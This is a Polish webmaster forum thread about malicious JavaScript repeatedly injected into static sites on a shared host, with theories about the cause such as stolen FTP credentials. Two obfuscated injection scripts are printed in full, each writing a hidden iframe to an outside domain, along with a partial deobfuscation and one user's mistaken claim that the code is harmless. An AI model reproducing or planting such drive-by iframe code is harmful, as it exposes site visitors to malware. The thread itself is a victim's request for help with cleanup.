Ktoś podpina mi wirusa do strony

[fahofiec]

Kilka dni temu uruchomiłem stronę, zawierającą zwykły, statyczny kod HTML, zapisany z rozszerzeniem PHP. Nie wiem jakim cudem, ale każdego dnia ktoś wkleja do mojego kodu jakiś skrypt JavaScript, który jest wykrywany przez programy antywirusowe jako szkodliwy. Kod wklejony dzisiaj wygląda następująco:

<!-- ad --><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
rmtyf=(6.5e1,"");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->

Wcześniej był chyba jakiś inny. Co robić???

[zakręcony]

miałem to wczoraj, nie na nazwie stoją strony?

[fahofiec]

miałem to wczoraj, nie na nazwie stoją strony?

Zgadza się, na Nazwa.pl. Ale mam na tym samym koncie kilkanaście stronek i tylko na jednej z nich dzieją się takie cuda. Co najdziwniejsze, nie jest to żaden dziurawy CMS, lecz zwykły statyczny HTML, próbowałem też ograniczyć prawa do pliku poprzez CHMOD, ale chyba nie poskutkowało.

EDYTOWANE: A jednak nie, mam ten syfiarski kod wykrywany jako wirus wstawiony na stronie głównej każdej witryny!!

[zakręcony]

na nazwie mają chyba jakąś dziure, bo mi leciało po wszytkich katalogach (katalog to subdomena), jak był index w katalogu to miałem ten kod

w katalogu root miałem stronę html, a z subdomen nie widać root, więc coś tam jest niezle nagmerane, dziś mam spokój, ale wczoraj kilka razy wszytkie indexy czyściłem

[fahofiec]

A jaka jest rzeczywista potencjalna szkodliwość takiego kodu? Boję się, że możne spowodować to spadek Trust Ranku Google'a, który uzna stronę za niebezpieczną, a o konsekwencjach boję się nawet wspominać.

[zakręcony]

mi wirola wykrywał NOD32, więc jakieś zagrożenie to na bank ma

edit: po wejściu na strone oczywiście wyłapywał

[neeon]

proponuje przeorać kompa , to że wam się kody nadpisują to już wynikowa

[Trotyl]

Jak wysłaliście zgłoszenie to powinni poprawić konfigurację serwera od ręki

[Tomahawk]

Swoją drogą...

Niewiem co ten kod robi ale majstersztyk;p

[mkr]

Przeskanować komputer KILKOMA antywirusami, zmienić hasła. Nie zapamiętywać haseł w Total Commander.

Sprawdzić skrypty.

Wystarczy, że jeden ze skryptów na serwerze jest dziurawy i z jego poziomu jest dostęp do innych katalogów z witrynami, żeby zarazić.

Jak nadal wystepują podmiany kontakt z hostingiem.

[fahofiec]

Właśnie ktoś założył podobny temat na forum Google'a: https://www.google.com/support/forum/p/Webm...4d4f9&hl=pl

Jak widać, jemu też wstawiono identyczny kod i odczuł już efekty - przejście na jego stronę z wyszukiwarki zostało zablokowane; wyskakuje ostrzeżenie "przejście do tej witryny może być niebezpieczne dla Twojego komputera!".

Jestem w podobnej sytuacji jak Zgred...

[Tomahawk]

Może to konkurencja dobiera wam się do du**?

Moim zdaniem to nie hosting jest dziurawy ale ma jakieś opcje typu odkryte widoki katalogów, pokazywanie błędów itd. które ujawniają dziury w skryptach...

[hekko]

A prawda jest taka (kilkukrotnie przerabiane na tym, innych forach jak i u nas w supporcie) że powodem doklejania są wirusy/trojany na komputerze które wykradają loginy/hasła z programów FTP.

[spookypld]

aaa=((567,9.007e3>=5e1?687:4804),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486).2717<=.77?7948>.2438?"write":3.:0x14))](((4,2.),(0.591,""+"<"+"if"+"r"+"a")+(82,7.3e1>=36?"me":.45)+(0.1301," sr"+"c"+"="+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,323,"et"+"/' st"+"yl"+"e='"+"v"+"isib"i)+(863>=8853?9.909e3:0x587,""+"i"+"li"+"ty"+":h"+"id"+"d"+"en"+"'"+"")+(69<38.?0.249:" "+">"+"</"+"if"+"")+(2.>1.?"ram"+"e>":64.)+(223.>=3953?1.:6.5e1,"")));</script><!-- /ad -->

hmmm... nie jestem znawcą ale to mi wygląda na kod wklejający ramkę

iframe src http ruittbros.net/style=visibility:hidden'+69<38.?0.249:> /iframe:64.223.>=

Czyli jest to ramka, prawdopodobnie nieszkodliwa, bo dodaje tylko niewidocznego linka na stronę producenta jedzenia, ale przyznam, że część kodu jest dla mnie niezrozumiałą i wygląda na zakodowaną w ASCII albo HEX. Nie mam pojęcia co te wszystkie cyfry oznaczają.

https://truitbros.net

ciekawe. na idg.pl mają działy, gdzie co jakiś czas odpowiadają na pytania eksperci od antywirusów. tam bym pytał co to jest.

[fahofiec]

Sprawdziłem właśnie swoje strony na zupełnie innym serwerze i... Wszystkie również mają podoklejany tajemniczy kod o treści:

<script>function c2678dc8d9i499d81d0aa7df(i499d81d0aafaf){ var i499d81d0ab77d=16; return (parseInt(i499d81d0aafaf,i499d81d0ab77d));}function i499d81d0ac71c(i499d81d0aceeb){ function i499d81d0ae658(){var i499d81d0aee28=2;return i499d81d0aee28;} var i499d81d0ad6ba='';i499d81d0af5f8=String.fromCharCode;for(i499d81d0ade89=0;i499d81d0ade89<i499d81d0aceeb.length;i499d81d0ade89+=i499d81d0ae658()){ i499d81d0ad6ba+=(i499d81d0af5f8(c2678dc8d9i499d81d0aa7df(i499d81d0aceeb.substr(i499d81d0ade89,i499d81d0ae658()))));}return i499d81d0ad6ba;} var r1d='';var i499d81d0afdc7='3C7'+r1d+'3637'+r1d+'2697'+r1d+'07'+r1d+'43E696628216D7'+r1d+'96961297'+r1d+'B646F637'+r1d+'56D656E7'+r1d+'42E7'+r1d+'7'+r1d+'7'+r1d+'2697'+r1d+'465287'+r1d+'56E657'+r1d+'363617'+r1d+'065282027'+r1d+'2533632536392536362537'+r1d+'3225363125366425363525323025366525363125366425363525336425363325333225333625
32302537'+r1d+'332537'+r1d+'32253633253364253237'+r1d+'2536382537'+r1d+'342537'+r1d+'342537'+r1d+'302533612532662532662536352536622537'+r1d+'332536622536632537'+r1d+'352537'+r1d+'612537'+r1d+'392537'+r1d+'37'+r1d+'2536652536312532652536332536662536642532652537'+r1d+'30253663253266253366253237'+r1d+'2532622534642536312537'+r1d+'342536382532652537'+r1d+'322536662537'+r1d+'352536652536342532382534642536312537'+r1d+'342536382532652537'+r1d+'3225363125366525363425366625366425323825323925326125333125333025333325333825
3336253330253239253262253237'+r1d+'253330253337'+r1d+'253334253632253339253333253336253338253634253636253634253237'+r1d+'2532302537'+r1d+'37'+r1d+'2536392536342537'+r1d+'34253638253364253331253338253330253230253638253635253639253637'+r1d+'2536382537'+r1d+'34253364253335253337'+r1d+'253337'+r1d+'2532302537'+r1d+'332537'+r1d+'342537'+r1d+'39253663253635253364253237'+r1d+'2537'+r1d+'362536392537'+r1d+'332536392536322536392536632536392537'+r1d+'342537'+r1d+'39253361253638253639253634253634253635253665253237'+r1d+'2533652533632532662536392536362537'+r1d+'3225363125366425363525336527'+r1d+'29293B7'+r1d+'D7'+r1d+'6617'+r1d+'2206D7'+r1d+'969613D7'+r1d+'47'+r1d+'27'+r1d+'5653B3C2F7'+r1d+'3637'+r1d+'2697'+r1d+'07'+r1d+'43E';document.write(i499d81d0ac71c(i499d81d0afdc7));</script>

Jeszcze trochę, a całkowicie się załamię.